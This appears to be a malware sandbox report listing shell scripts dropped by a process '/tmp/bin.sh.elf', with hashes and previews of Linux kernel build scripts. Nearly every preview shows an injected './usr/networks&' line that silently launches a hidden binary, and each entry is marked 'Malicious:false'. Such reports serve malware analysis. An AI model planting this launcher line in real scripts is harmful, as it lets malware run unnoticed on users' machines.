                                                                  Preview:./usr/networks&..exit 1.fi..# Grab arguments.INFILE=$1.OUTFILE=$2.TMPFILE=$OUTFILE.tmp..trap 'rm -f $OUTFILE $TMPFILE' EXIT..# SPDX-License-Identifier with GPL variants must have "WITH Linux-syscall-note".if [ -n "$(sed -n -e "/SPDX-License-Identifier:.*GPL-/{/WITH Linux-syscall-note/!p}" $INFILE)" ]; then..echo "error: $INFILE: missing \"WITH Linux-syscall-note\" for SPDX-License-Identifier" >&2..exit 1.fi..sed -E -e '..s/([[:space:](])(__user|__force|__iomem)[[:space:]]/\1/g..s/__attribute_const__([[:space:]]|$)/\1/g..s@^#include <linux/compiler(|_types).h>@@..s/(^|[^a-zA-Z0-9])__packed([^a-zA-Z0-9_]|$)/\1__attribute__((packed))\2/g..s/(^|[[:space:](])(inline|asm|volatile)([[:space:](]|$)/\1__\2__\3/g..s@#(ifndef|define|endif[[:space:]]*/[*])[[:space:]]*_UAPI@#\1 @.' $INFILE > $TMPFILE || exit 1..scripts/unifdef -U__KERNEL__ -D__EXPORTED_HEADERS__ $TMPFILE > $OUTFILE.[ $? -gt 1 ] && exit 1..# Remove /* ... */ style comments, and find CONFIG_ references in code.configs=$(sed -e '.:com
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):543
                                                                  Entropy (8bit):5.065619669350735
                                                                  Encrypted:false
                                                                  SSDEEP:12:w6vaDVR27MTCVT9GD6va2Ys74S6vMSASVRWGn:raDVR2AEGYae74pMSASqG
                                                                  MD5:E915887E36621505EC5730DC29D2298A
                                                                  SHA1:C0C7CB262A57CF220FFB76AB5BAF18AEAD18263D
                                                                  SHA-256:838808BA102CA4D94A9455E9492601B7794118EABB72CBF4C8FB5F36B0473CC1
                                                                  SHA-512:5431B59388C7DE50978F4A14DFEDF8A39693558C23EDA1B5979DDE08A36C90FE167908A4C3BC6CCE15B02756BAD64C589B231F28E08C8B0ADF7EB3E55D625B20
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..if ! pkg-config --exists $PKG; then..echo >&2 "*"..echo >&2 "* Unable to find the GTK+ installation. Please make sure that"..echo >&2 "* the GTK+ 2.0 development package is correctly installed."..echo >&2 "* You need $PKG"..echo >&2 "*"..exit 1.fi..if ! pkg-config --atleast-version=2.0.0 gtk+-2.0; then..echo >&2 "*"..echo >&2 "* GTK+ is present but version >= 2.0.0 is required."..echo >&2 "*"..exit 1.fi..echo cflags=\"$(pkg-config --cflags $PKG)\".echo libs=\"$(pkg-config --libs $PKG)\"../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):937
                                                                  Entropy (8bit):5.114746161722375
                                                                  Encrypted:false
                                                                  SSDEEP:24:M8DySASNUS/tDRh8L9VnOITGvqMTGk1TGRSqMTGHyTGSqFhSRqj80UaT:M4yyp8HPUqMZVqM3PqQhOT
                                                                  MD5:FD01A2ED48E4F03577EE3CAED8CA3A76
                                                                  SHA1:04425B409496394CBCCAC34B85A0F364A2D671C9
                                                                  SHA-256:F6E93883CAE43A4A3DF14DF124FB15314977A7E9E44737B1010D01ECDB05393D
                                                                  SHA-512:C3238237408DE01A1E2326444753DCFD764A1DD2D8549CC92D86AA16BE571C8D7D144E7A47578D5C3F9C533639C869391345CAC10476E87146B4BDC5A8560819
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 0..fi...if pkg-config --exists $PKG2; then...echo cflags=\"$(pkg-config --cflags $PKG2)\"...echo libs=\"$(pkg-config --libs $PKG2)\"...exit 0..fi.fi..# Check the default paths in case pkg-config is not installed..# (Even if it is installed, some distributions such as openSUSE cannot.# find ncurses by pkg-config.).if [ -f /usr/include/ncursesw/ncurses.h ]; then..echo cflags=\"-D_GNU_SOURCE -I/usr/include/ncursesw\"..echo libs=\"-lncursesw\"..exit 0.fi..if [ -f /usr/include/ncurses/ncurses.h ]; then..echo cflags=\"-D_GNU_SOURCE -I/usr/include/ncurses\"..echo libs=\"-lncurses\"..exit 0.fi..if [ -f /usr/include/ncurses.h ]; then..echo cflags=\"-D_GNU_SOURCE\"..echo libs=\"-lncurses\"..exit 0.fi..echo >&2 "*".echo >&2 "* Unable to find the ncurses package.".echo >&2 "* Install ncurses (ncurses-devel or libncurses-dev".echo >&2 "* depending on your distribution).".echo >&2 "*".exit 1../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3316
                                                                  Entropy (8bit):5.543534555649817
                                                                  Encrypted:false
                                                                  SSDEEP:96:KqG3UXD1JB2y/p0ko0+bgXX0OgAcY0jy84wEIseQIbbFS:bG3y1JB2y9+UXEhAD0jy8rEY3FS
                                                                  MD5:953A81654F7307688C8402BDA37C2EA4
                                                                  SHA1:293F65679CA388602BEAA31F2A5CBCE08AC8FC11
                                                                  SHA-256:794B3905FD480E6EABC275800C2981278620AD0FDEA13F8A700AB9A3B0DAB741
                                                                  SHA-512:AA66F2D6DFA3379E4ECB17C2D95FDC77794A8F29719EEAE736DAECE66DDEF6970BAF3568181C59EE02138BAB5281A3DCA232A02D80BC252667A569538BFA52BE
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit...;;.."-r")...WARNREDUN=true...shift...continue...;;.."-y")...BUILTIN=true...shift...continue...;;.."-O")...if [ -d $2 ];then....OUTPUT=$(echo $2 | sed 's/\/*$//')...else....echo "output directory $2 does not exist" 1>&2....exit 1...fi...shift 2...continue...;;..*)...break...;;..esac.done..if [ "$#" -lt 1 ] ; then..usage..exit.fi..if [ -z "$KCONFIG_CONFIG" ]; then..if [ "$OUTPUT" != . ]; then...KCONFIG_CONFIG=$(readlink -m -- "$OUTPUT/.config")..else...KCONFIG_CONFIG=.config..fi.fi..INITFILE=$1.shift;..if [ ! -r "$INITFILE" ]; then..echo "The base file '$INITFILE' does not exist. Exit." >&2..exit 1.fi..MERGE_LIST=$*.SED_CONFIG_EXP1="s/^\(${CONFIG_PREFIX}[a-zA-Z0-9_]*\)=.*/\1/p".SED_CONFIG_EXP2="s/^# \(${CONFIG_PREFIX}[a-zA-Z0-9_]*\) is not set$/\1/p"..TMP_FILE=$(mktemp ./.tmp.config.XXXXXXXXXX).MERGE_FILE=$(mktemp ./.merge_tmp.config.XXXXXXXXXX)..echo "Using $INITFILE as base"..trap clean_up EXIT..cat $INITFILE > $TMP_FILE..# Merge files, printing warnings on ov
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):984
                                                                  Entropy (8bit):5.110032530027797
                                                                  Encrypted:false
                                                                  SSDEEP:24:M8DySASNUS/tDRh8L9VnOITGvqMTGkGTGRSqMTGHvTGSqF2SRqj80UaT:M4yyp8HPUqMaVqMMPqnhOT
                                                                  MD5:D9E63E4727EEEE4A282F447A955DB059
                                                                  SHA1:79CDDDC7912CF9F945B8B001E5AC69A1077D64E8
                                                                  SHA-256:E97AFE8D30A5A9A97D8E6F922DBA587C5A5745C48A8DE70C72A012EFD771C632
                                                                  SHA-512:163C0ECCE5F2FC859B13DBEED889DFA46F77D27CBD563965ACB32F3B06469EF1709E6A62185509B76E5C731A1611E88F757B490277C5A3D2862AB77022851199
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 0..fi...if pkg-config --exists $PKG2; then...echo cflags=\"$(pkg-config --cflags $PKG2)\"...echo libs=\"$(pkg-config --libs $PKG2)\"...exit 0..fi.fi..# Check the default paths in case pkg-config is not installed..# (Even if it is installed, some distributions such as openSUSE cannot.# find ncurses by pkg-config.).if [ -f /usr/include/ncursesw/ncurses.h ]; then..echo cflags=\"-D_GNU_SOURCE -I/usr/include/ncursesw\"..echo libs=\"-lncursesw -lmenuw -lpanelw\"..exit 0.fi..if [ -f /usr/include/ncurses/ncurses.h ]; then..echo cflags=\"-D_GNU_SOURCE -I/usr/include/ncurses\"..echo libs=\"-lncurses -lmenu -lpanel\"..exit 0.fi..if [ -f /usr/include/ncurses.h ]; then..echo cflags=\"-D_GNU_SOURCE\"..echo libs=\"-lncurses -lmenu -lpanel\"..exit 0.fi..echo >&2 "*".echo >&2 "* Unable to find the ncurses package.".echo >&2 "* Install ncurses (ncurses-devel or libncurses-dev".echo >&2 "* depending on your distribution).".echo >&2 "*".exit 1../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):644
                                                                  Entropy (8bit):5.228498774032447
                                                                  Encrypted:false
                                                                  SSDEEP:12:w6vQ7QDR5GSVQzMWejGQ77QDxSASVhrMWGNGBvRrkFkjr9dn0puyTn:r3DR5GS2ZUGxDxSASRsGBvpkFkddn0J
                                                                  MD5:2B410BC9465C65BB5548FD8FA489FC20
                                                                  SHA1:B040F7C49A2B32DD74971B2BA918D956F18ADCF0
                                                                  SHA-256:4815CCA4D8102C93E1E7FBDD35FDF59B52B31A7FC9C5FE6743A38023E689170A
                                                                  SHA-512:9AA861B53D53811916F5A54DFEA3474447F343F7282A8EA054F896235A27A7445FCE49AF3CB71C5095846E5FC3C9C301F2790CF686F7D632761F3BDC06E4ADA8
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..if pkg-config --exists $PKG; then..echo cflags=\"-std=c++11 -fPIC $(pkg-config --cflags Qt5Core Qt5Gui Qt5Widgets)\"..echo libs=\"$(pkg-config --libs $PKG)\"..echo moc=\"$(pkg-config --variable=host_bins Qt5Core)/moc\"..exit 0.fi..if pkg-config --exists $PKG2; then..echo cflags=\"$(pkg-config --cflags $PKG2)\"..echo libs=\"$(pkg-config --libs $PKG2)\"..echo moc=\"$(pkg-config --variable=moc_location QtCore)\"..exit 0.fi..echo >&2 "*".echo >&2 "* Could not find Qt via pkg-config.".echo >&2 "* Please install either Qt 4.8 or 5.x. and make sure it's in PKG_CONFIG_PATH".echo >&2 "*".exit 1../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):48
                                                                  Entropy (8bit):3.9672232412544224
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVaroOORgn:Bn
                                                                  MD5:553252F0DEE7D4E172F4B27C1491B5C5
                                                                  SHA1:D9514909B4689F279C9FEC25124B8C1DE69A74E8
                                                                  SHA-256:4A0B5069B54319442EB5F6DF6ADB1D6A9F2BBEB0B540465B2818AC5A51A4C6A8
                                                                  SHA-512:7245D00F3A1441F8B10EBE51126FB41609F0C1CF06CEF4BD9320C1D4A8046AC1EA7C421C66131058F73AED16F01CFF3E879DAC85FD6B1FA2E7499E733A38401C
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit..}../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3104
                                                                  Entropy (8bit):5.319473187672963
                                                                  Encrypted:false
                                                                  SSDEEP:48:CvglysBnQd18RgbICaKw6i7MQ0aiRJygJKQCPh3NY1PeUyOeaU6CkRx7X:sJgnQCgbKKw6iPFVNoPetFgL
                                                                  MD5:7C45113DDC652E13DE69CC646EDE42D0
                                                                  SHA1:AB7A40BF4E6FCDC9597545ACB0CC0AD28294684E
                                                                  SHA-256:0095A846AF18E74F2B8C358599A28829A2012F6643261F22F88F418B5A968900
                                                                  SHA-512:BA067807CD4118C2360B14A4E258FF004048D461854B4ECF84FF7339C767E39D7B4BA9682E8D4C40C47F5BEC788E2CCC93C54727CA19601F80C015D680078D3A
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.on_exit().{..if [ $? -ne 0 ]; then...cleanup..fi.}.trap on_exit EXIT..on_signals().{..exit 1.}.trap on_signals HUP INT QUIT TERM..#.#.# Use "make V=1" to debug this script.case "${KBUILD_VERBOSE}" in.*1*)..set -x..;;.esac..if [ "$1" = "clean" ]; then..cleanup..exit 0.fi..# We need access to CONFIG_ symbols.. include/config/auto.conf..# Update version.info GEN .version.if [ -r .version ]; then..VERSION=$(expr 0$(cat .version) + 1)..echo $VERSION > .version.else..rm -f .version..echo 1 > .version.fi;..# final build of init/.${MAKE} -f "${srctree}/scripts/Makefile.build" obj=init..#link vmlinux.o.info LD vmlinux.o.modpost_link vmlinux.o..# modpost vmlinux.o to check for section mismatches.${MAKE} -f "${srctree}/scripts/Makefile.modpost" MODPOST_VMLINUX=1..info MODINFO modules.builtin.modinfo.${OBJCOPY} -j .modinfo -O binary vmlinux.o modules.builtin.modinfo..btf_vmlinux_bin_o="".if [ -n "${CONFIG_DEBUG_INFO_BTF}" ]; then..btf_vmlinux_bin_o=.btf.vmlinux.bin.o..if ! gen_btf
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):113
                                                                  Entropy (8bit):4.89780484089231
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVPnhdzHFTMcA+URkjAd8HHBdKDXVOORgn:cnhdzlokjAdae4n
                                                                  MD5:83D2F205EC6B453B25B80B148277906B
                                                                  SHA1:2640110859CC7FB91BCAB211917F85BCE21CE507
                                                                  SHA-256:99D204944A4F242841E7E5B06FF76B7F484F08D4893F84B3A599730306F24305
                                                                  SHA-512:B81E66A2B1E64AAB63558F078598360D98AF3DD11ECA2B01D67AA52F53536DF4AE30A2397AB55D389F59259807F1B06CFC69C1DF41630449BE4400D4FD3CD53D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 1;..fi.fi..# Call "mkimage" to create U-Boot image.${MKIMAGE} "$@"../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2256
                                                                  Entropy (8bit):5.103102723612671
                                                                  Encrypted:false
                                                                  SSDEEP:48:r3DF8L0vw6FI7GSECAi4zDYGc0VXDfjX4D9mt+7F5IWpkCPKLJJSJbRhAaD:W6X3QcfTLp2VD
                                                                  MD5:AF1E91F2E72D207A26007E51ED3846F7
                                                                  SHA1:3DA415BBA18AB54473D970F38F8E4EE3C90EC66B
                                                                  SHA-256:969556D61B9A7975233D78D3F8BDA1F10D1624692597F505C2F0149A98AAC940
                                                                  SHA-512:B37F388A5E14C93170530310BB0A53A29F9D97E749D8F41B1ABA1EC6B64E6C40AF5825CDA211DA3BC6D541F8A506BC79B0020A3FB64EBAB09C82C59CB0DC1226
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..SF=`which setfiles`.if [ $? -eq 1 ]; then..echo "Could not find setfiles"..echo "Do you have policycoreutils installed?"..exit 1.fi..CP=`which checkpolicy`.if [ $? -eq 1 ]; then..echo "Could not find checkpolicy"..echo "Do you have checkpolicy installed?"..exit 1.fi.VERS=`$CP -V | awk '{print $1}'`..ENABLED=`which selinuxenabled`.if [ $? -eq 1 ]; then..echo "Could not find selinuxenabled"..echo "Do you have libselinux-utils installed?"..exit 1.fi..if selinuxenabled; then. echo "SELinux is already enabled". echo "This prevents safely relabeling all files.". echo "Boot with selinux=0 on the kernel command-line or". echo "SELINUX=disabled in /etc/selinux/config.". exit 1.fi..cd mdp../mdp -m policy.conf file_contexts.$CP -U allow -M -o policy.$VERS policy.conf..mkdir -p /etc/selinux/dummy/policy.mkdir -p /etc/selinux/dummy/contexts/files..echo "__default__:user_u:s0" > /etc/selinux/dummy/seusers.echo "base_r:base_t:s0" > /etc/selinux/dummy/context
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1837
                                                                  Entropy (8bit):5.370491142600355
                                                                  Encrypted:false
                                                                  SSDEEP:24:St5ewlRPEuhVVNBRocmWTfF6oFtEhn5EpMAF6kFSqAAuqA1H1/zF+vQLZE6:QIjIBRoc7B6oFtE5wM0FzjdwH1/QEj
                                                                  MD5:2924623DFB48348E3CADD1409DB02819
                                                                  SHA1:0980E6BB937886B45B03015771B405BAF981133A
                                                                  SHA-256:12D814E1083E8E2BDC73AAF4066F9C331288D1D4D26F308E6A46B56DAD520732
                                                                  SHA-512:D7205986E227281642FE78C2919D205F0404AFDE5B16E295F79AAB08BDC44DA1266FA913611A46EEE7206BA5555CD01EB2995BDDA91970051A5F4DBE7CB5F059
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..-I __initdata,__exitdata,__initconst,__ro_after_init.\..-I __initdata_memblock.....\..-I __refdata,__attribute,__maybe_unused,__always_unused \..-I __acquires,__releases,__deprecated,__always_inline.\..-I __read_mostly,__aligned,____cacheline_aligned \..-I ____cacheline_aligned_in_smp \..-I __cacheline_aligned,__cacheline_aligned_in_smp.\..-I ____cacheline_internodealigned_in_smp \..-I __used,__packed,__packed2__,__must_check,__must_hold.\..-I EXPORT_SYMBOL,EXPORT_SYMBOL_GPL,ACPI_EXPORT_SYMBOL \..-I DEFINE_TRACE,EXPORT_TRACEPOINT_SYMBOL,EXPORT_TRACEPOINT_SYMBOL_GPL \..-I static,const......\..--extra=+fq --c-kinds=+px --fields=+iaS --langmap=c:+.h \.."${regex[@]}"...setup_regex exuberant kconfig..all_kconfigs | xargs $1 -a \..--langdef=kconfig --language-force=kconfig "${regex[@]}"..}..emacs().{..setup_regex emacs asm c..all_target_sources | xargs $1 -a "${regex[@]}"...setup_regex emacs kconfig
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):283
                                                                  Entropy (8bit):4.83654391993755
                                                                  Encrypted:false
                                                                  SSDEEP:6:xE6TVbTuqFQ7oK7qTIFs1OhOiQQLO5F8QUQjbTn:nbTu+Q52ce1ONQwOcrmbTn
                                                                  MD5:4DF442F6E11CE8D0979E6182386686A2
                                                                  SHA1:81719268B3AEDA9531465D3EAC4E67AAEDCA1397
                                                                  SHA-256:55264C606A6D80EC711BEAAF12EF38C1F10BEF9142291CFAF653B3F823FE842B
                                                                  SHA-512:F8D1E831F9226792250715F5EFDDA938690FE986AE4B84257A5990DECCAF0361A1519F2DBDB4D3082513A590D373B879739AC42A10047C29FDF13A39EB2A8E42
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.# Despite printing an error message, GNU nm still exits with exit code 0 if it.# sees a relr section. So we need to check that nothing is printed to stderr..test -z "$($NM $tmp_file 2>&1 >/dev/null)"..$OBJCOPY -O binary $tmp_file $tmp_file.bin../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):625
                                                                  Entropy (8bit):4.736984587737299
                                                                  Encrypted:false
                                                                  SSDEEP:12:aSCPoUOEmrGTUF6vGWzz+NSI9ZZ+gwSUz+NSI9ZZ+g/AcEMdLPn:58wGTRGWG8I9ZkpSj8I9ZkuhP
                                                                  MD5:04209F5550AAEBD8875831972E159484
                                                                  SHA1:35BD4A57B4F79218468D56CC721F7AE667F6A800
                                                                  SHA-256:E4D56D5F89198BA7EB9F942E04AFAD0DB90E9A733589881EF18CDAAF597A3B20
                                                                  SHA-512:7279D50639DA40C0CB6FA8930895CE09CF0EB2FB41A0EC40F6C6ED542D0326E78927175783D3DBC570C4E08B87FECFDA585AE1D4E44BDB00511260C783B3008F
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit.fi..full=$1.test=$2.nontest=$3..x=`cat $full | wc -l`.if [ $x -eq 1 ]; then..echo "There's only one function left, must be the bad one"..cat $full..exit 0.fi..let x=$x/2.let y=$x+1..if [ ! -f $full ]; then..echo "$full does not exist"..exit 1.fi..if [ -f $test ]; then..echo -n "$test exists, delete it? [y/N]"..read a..if [ "$a" != "y" -a "$a" != "Y" ]; then...exit 1..fi.fi..if [ -f $nontest ]; then..echo -n "$nontest exists, delete it? [y/N]"..read a..if [ "$a" != "y" -a "$a" != "Y" ]; then...exit 1..fi.fi..sed -ne "1,${x}p" $full > $test.sed -ne "$y,\$p" $full > $nontest../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1031
                                                                  Entropy (8bit):4.898245174609079
                                                                  Encrypted:false
                                                                  SSDEEP:24:PnsUDDkltWXlYWkvXlOIkvXlXLkTmKU+IcnsUUbDk19QkUmzyeZNkkUmnj655:PxPG2lYWWlhWlXLEmcxUHsG7mzdm7muv
                                                                  MD5:74FEEA347EB00465B2FF6A5BE46CE193
                                                                  SHA1:6005C8B5D8FD79C88F0CDB5B6EEB9E11778CCA0B
                                                                  SHA-256:460A83F842C839EE72F9FD88A787CFE97CE8F3F0DB23BCE2441CF7A364018B30
                                                                  SHA-512:768798570AD0DFCBCD01070FEA49B07779CB65174A7D855BB1F737B9B5995D842FA364312BA1D96BCC544BC3158C8A01450502A46CB1ADDBE4691E6997235452
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.. exit -1..fi...make -C ex V=1 clean > /dev/null 2>&1..rm -f ex.out.}..function test_ex_suffix {..make -C ex V=1 clean > ex.out 2>&1...# use -rR to disable make's builtin rules..make -rR -C ex V=1 ex.o >> ex.out 2>&1..make -rR -C ex V=1 ex.i >> ex.out 2>&1..make -rR -C ex V=1 ex.s >> ex.out 2>&1...if [ -x ./ex/ex ]; then.. echo FAILED.. exit -1..fi...if [ ! -f ./ex/ex.o -o ! -f ./ex/ex.i -o ! -f ./ex/ex.s ]; then.. echo FAILED.. exit -1..fi...make -C ex V=1 clean > /dev/null 2>&1..rm -f ex.out.}..function test_ex_include {..make -C ex V=1 clean > ex.out 2>&1...# build with krava.h include..touch ex/krava.h..make -C ex V=1 CFLAGS=-DINCLUDE >> ex.out 2>&1...if [ ! -x ./ex/ex ]; then.. echo FAILED.. exit -1..fi...# build without the include..rm -f ex/krava.h ex/ex..make -C ex V=1 >> ex.out 2>&1...if [ ! -x ./ex/ex ]; then.. echo FAILED.. exit -1..fi...make -C ex V=1 clean > /dev/null 2>&1..rm -f ex.out.}..echo -n Testing....test_ex.test_ex_suffix.test_ex_include..
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):5106
                                                                  Entropy (8bit):5.190549172542396
                                                                  Encrypted:false
                                                                  SSDEEP:96:mpzdPYL4qY63562BXlrbCZpygpSEKejb36/jNE4XmJocZejkmav:+dAn1N618E9HO/X0oox
                                                                  MD5:DC156EF93268E173D39F8BAAF8978ABB
                                                                  SHA1:6E251C5140BF99DD85D6FE5CCBF82FE5F7DBD25D
                                                                  SHA-256:BB35B90477911C8A5E397FB4AF4AB5AAB25067DAFD6062567B7E906F3932B0E1
                                                                  SHA-512:5638FE84DBB13D9862EC314A58789EBE79A158576BA2BA120FE7973F6F11F18A0B5C0F3FA1867EA0ECFD09063CF738841F287A6342C3A578C8DC70D1F0504BE2
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..if [ ! -f $led_defs_path ]; then..echo "$led_defs_path doesn't exist"..exit 1.fi..led_cdev_path=`echo $1 | sed s'/\/$//'`..ls "$led_cdev_path/brightness" > /dev/null 2>&1.if [ $? -ne 0 ]; then..echo "Device \"$led_cdev_path\" does not exist."..exit 1.fi..bus=`readlink $led_cdev_path/device/subsystem | sed s'/.*\///'`.usb_subdev=`readlink $led_cdev_path | grep usb | sed s'/\(.*usb[0-9]*\/[0-9]*-[0-9]*\)\/.*/\1/'`.ls "$led_cdev_path/device/of_node/compatible" > /dev/null 2>&1.of_node_missing=$?..if [ "$bus" = "input" ]; then..input_node=`readlink $led_cdev_path/device | sed s'/.*\///'`..if [ ! -z "$usb_subdev" ]; then...bus="usb"..fi.fi..if [ "$bus" = "usb" ]; then..usb_interface=`readlink $led_cdev_path | sed s'/.*\(usb[0-9]*\)/\1/' | cut -d\/ -f3`..cd $led_cdev_path/../$usb_subdev..driver=`readlink $usb_interface/driver | sed s'/.*\///'`..if [ -d "$usb_interface/ieee80211" ]; then...wifi_phy=`ls -l $usb_interface/ieee80211 | grep phy | awk '{print $9}'`..fi.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):821
                                                                  Entropy (8bit):4.94867885977058
